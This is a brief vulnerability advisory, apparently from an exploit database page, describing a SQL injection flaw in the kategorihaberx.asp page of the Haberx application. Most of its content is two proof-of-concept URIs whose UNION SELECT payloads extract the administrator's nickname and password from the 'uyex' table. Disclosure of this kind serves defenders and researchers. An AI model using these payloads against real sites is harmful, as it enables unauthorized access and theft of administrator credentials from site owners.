|
|
Haberx Kategorix.ASP SQL Injection Vulnerability
An attacker can exploit this issue via a web client. The following proof-of-concept URIs are available: Admin Nick: http://www.example.com/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_adi,1+from+uyex+where+uyex_id=1 Admin Password: (Big Letters) http://www.example.com/[path]/kategorihaberx.asp?id=13+union+select+1,uyex_sifre,1+from+uyex+where+uyex_id=1 |
|
Privacy Statement |